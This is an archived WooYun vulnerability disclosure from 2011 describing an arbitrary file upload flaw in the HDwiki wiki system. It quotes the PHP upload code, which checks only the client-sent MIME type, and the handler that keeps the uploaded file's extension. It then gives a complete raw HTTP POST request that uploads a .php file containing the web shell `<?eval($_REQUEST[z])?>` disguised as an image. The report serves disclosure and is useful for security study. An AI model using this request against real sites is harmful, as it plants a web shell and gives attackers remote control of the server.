乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2011-08-23: 细节已通知厂商并且等待厂商处理中 2011-09-10: 厂商已经主动忽略漏洞,细节向公众公开
互动维客开源系统(HDwiki)作为中国第一家拥有自主知识产权的中文维基(Wiki)系统,由互动在线(北京)科技有限公司于2006 年11月28日正式推出,力争为给国内外众多的维基(Wiki)爱好者提供一个免费、易用、功能强大的维基(Wiki)建站系统。HDwiki的推出,填补了中文维基(Wiki)建站系统的空白但是HDwiki中某些上传功能存在安全漏洞,通过一些数据即可绕过上传限制,最终控制远程站点
lib/file.class.php中
function uploadfile($attachment,$target,$maxsize=1024,$is_image=1){ $result=array ('result'=>false,'msg'=>'upload mistake'); if($is_image){ $attach=$attachment; $filesize=$attach['size']/1024; if(0==$filesize){ $result['msg'] = '上传错误'; return $result; } if(substr($attach['type'],0,6)!='image/'){ $result['msg'] ='格式错误'; return $result; } if($filesize>$maxsize){ $result['msg'] ='文件过大'; return $result; } }else{ $attach['tmp_name']=$attachment; } $filedir=dirname($target); file::forcemkdir($filedir); if(@copy($attach['tmp_name'],$target) || @move_uploaded_file($attach['tmp_name'],$target)){
没有什么检查attachment.php里触发
function douploadimg() { $imgname=$_FILES['photofile']['name']; $extname=file::extname($imgname); $destfile=$_ENV['attachment']->makepath($extname); $arrupload=file::uploadfile($_FILES['photofile'],$destfile);
POST /hdwiki/index.php?attachment-uploadimg HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Referer: http://www.wooyun.org/Accept-Language: zh-cnContent-Type: multipart/form-data; boundary=---------------------------7db261e100f2eUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)Host: www.wooyun.orgContent-Length: 370Connection: Keep-AliveCache-Control: no-cacheCookie: Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1298002704449; hd_sid=raG13H; hd_auth=4113YBBXXB13XtdR6EXTA1Cb9BuhZMK%2F29wdoHDQJTV5QZOoYd62OHd46iXKqf4Qz%2F5gc6pLm9fZ%2Bdgv68MT; hd_searchtime=1300983373-----------------------------7db261e100f2eContent-Disposition: form-data; name="MAX_FILE_SIZE"30000-----------------------------7db261e100f2eContent-Disposition: form-data; name="photofile"; filename="C:\fucker\z.php"Content-Type: image/imagezzz<?eval($_REQUEST[z])?>-----------------------------7db261e100f2e--
额
危害等级:无影响厂商忽略
忽略时间:2011-09-10 16:03
漏洞Rank:12 (WooYun评价)
暂无